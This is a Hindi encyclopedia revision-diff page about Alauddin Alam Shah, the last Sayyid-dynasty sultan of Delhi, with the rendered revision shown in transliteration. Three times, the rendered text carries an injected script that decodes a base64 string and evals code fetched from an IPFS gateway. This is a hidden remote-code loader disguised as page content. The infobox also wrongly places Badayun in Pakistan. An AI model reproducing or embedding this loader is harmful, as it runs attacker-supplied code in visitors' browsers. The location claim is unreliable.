Difference between revisions of "अलाउद्दीन आलमशाह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:सैयद वंश (को हटा दिया गया हैं।))
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[मुहम्मदशाह]] की मृत्यु के बाद उसका पुत्र '''अलाउद्दीन''', 'अलाउद्दीन आलमशाह' की उपाधि ग्रहण कर सिंहासन पर बैठा।
+
{{सूचना बक्सा ऐतिहासिक शासक
 +
|चित्र=Blank-Image-2.jpg
 +
|चित्र का नाम=
 +
|पूरा नाम=अलाउद्दीन आलमशाह
 +
|अन्य नाम=
 +
|जन्म=
 +
|जन्म भूमि=
 +
|मृत्यु तिथि=1476
 +
|मृत्यु स्थान=[[बदायूँ]], [[पाकिस्तान]]
 +
|पिता/माता=[[मुहम्मदशाह]], (पिता)
 +
|पति/पत्नी=
 +
|संतान=
 +
|उपाधि=
 +
|राज्य सीमा=
 +
|शासन काल=
 +
|शासन अवधि=(1445-1450 ई.)
 +
|राज्याभिषेक= (1445 ई.)
 +
|धार्मिक मान्यता=
 +
|युद्ध=
 +
|प्रसिद्धि=
 +
|निर्माण=
 +
|सुधार-परिवर्तन=
 +
|राजधानी=
 +
|पूर्वाधिकारी=
 +
|उत्तराधिकारी=
 +
|राजघराना=
 +
|वंश=[[सैय्यद वंश]]
 +
|स्मारक=
 +
|मक़बरा=
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी='अलाउद्दीन आलमशाह' को अपने वज़ीर [[हमीद ख़ाँ]] से अनबन होने के कारण [[दिल्ली]] छोड़कर [[बदायूँ]] में शरण लेनी पड़ी
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन={{अद्यतन|12:28, 3 नवम्बर 2016 (IST)}}
 +
}}
 +
'''अलाउद्दीन''' (1445-1450 ई.) [[सैयद वंश]] के [[मुहम्मदशाह]] का पुत्र था। मुहम्मदशाह की मृत्यु के बाद अलाउद्दीन ने 'आलमशाह' की उपाधि ग्रहण की और अलाउद्दीन आलमशाह के नाम से सिंहासन पर बैठा।
 +
 
 
*वह आराम पसन्द एवं विलासी प्रवृत्ति का व्यक्ति था।
 
*वह आराम पसन्द एवं विलासी प्रवृत्ति का व्यक्ति था।
*अलाउद्दीन आलमशाह को अपने वज़ीर हमीद ख़ाँ से अनबन होने के कारण [[दिल्ली]] छोड़कर [[बदायूँ]] में शरण लेनी पड़ी तथा हमीद ख़ाँ ने [[बहलोल लोदी]] को दिल्ली आमंत्रित किया।
+
*अलाउद्दीन आलमशाह को अपने वज़ीर [[हमीद ख़ाँ]] से अनबन होने के कारण [[दिल्ली]] छोड़कर [[बदायूँ]] में शरण लेनी पड़ी तथा हमीद ख़ाँ ने [[बहलोल लोदी]] को दिल्ली आमंत्रित किया।
 
*बहलोल लोदी ने दिल्ली आने के कुछ दिन बाद हमीद ख़ाँ की हत्या करवाकर 1450 ई. में दिल्ली प्रशासन को अपने अधिकार में कर लिया।
 
*बहलोल लोदी ने दिल्ली आने के कुछ दिन बाद हमीद ख़ाँ की हत्या करवाकर 1450 ई. में दिल्ली प्रशासन को अपने अधिकार में कर लिया।
 
*दूसरी तरफ सुल्तान अलाउद्दीन आलमशाह ने अपने को बदायूँ में ही सुरक्षित महसूस किया और वहीं पर 1476 ई. में उसकी मृत्यु हो गई।
 
*दूसरी तरफ सुल्तान अलाउद्दीन आलमशाह ने अपने को बदायूँ में ही सुरक्षित महसूस किया और वहीं पर 1476 ई. में उसकी मृत्यु हो गई।
 
*इस प्रकार लगभग 37 वर्ष के बाद सैय्यद वंश समाप्त हो गया।
 
*इस प्रकार लगभग 37 वर्ष के बाद सैय्यद वंश समाप्त हो गया।
  
{{प्रचार}}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
{{लेख प्रगति
 
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 +
{{सैयद वंश}}
 
{{दिल्ली सल्तनत}}
 
{{दिल्ली सल्तनत}}
 
+
[[Category:दिल्ली सल्तनत]][[Category:सैयद वंश]][[Category:इतिहास कोश]]
[[Category:इतिहास कोश]]
 
[[Category:दिल्ली सल्तनत]]
 
[[Category:सैयद वंश]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 06:58, 3 November 2016

alauddin alamashah
poora nam alauddin alamashah
mrityu tithi 1476
mrityu sthan badayooan, pakistan
pita/mata muhammadashah, (pita)
sha. avadhi (1445-1450 ee.)
rajyabhishek (1445 ee.)
vansh saiyyad vansh
any janakari 'alauddin alamashah' ko apane vazir hamid khaan se anaban hone ke karan dilli chho dakar badayooan mean sharan leni p di
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

alauddin (1445-1450 ee.) saiyad vansh ke muhammadashah ka putr tha. muhammadashah ki mrityu ke bad alauddin ne 'alamashah' ki upadhi grahan ki aur alauddin alamashah ke nam se sianhasan par baitha.

  • vah aram pasand evan vilasi pravritti ka vyakti tha.
  • alauddin alamashah ko apane vazir hamid khaan se anaban hone ke karan dilli chho dakar badayooan mean sharan leni p di tatha hamid khaan ne bahalol lodi ko dilli amantrit kiya.
  • bahalol lodi ne dilli ane ke kuchh din bad hamid khaan ki hatya karavakar 1450 ee. mean dilli prashasan ko apane adhikar mean kar liya.
  • doosari taraph sultan alauddin alamashah ne apane ko badayooan mean hi surakshit mahasoos kiya aur vahian par 1476 ee. mean usaki mrityu ho gee.
  • is prakar lagabhag 37 varsh ke bad saiyyad vansh samapt ho gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh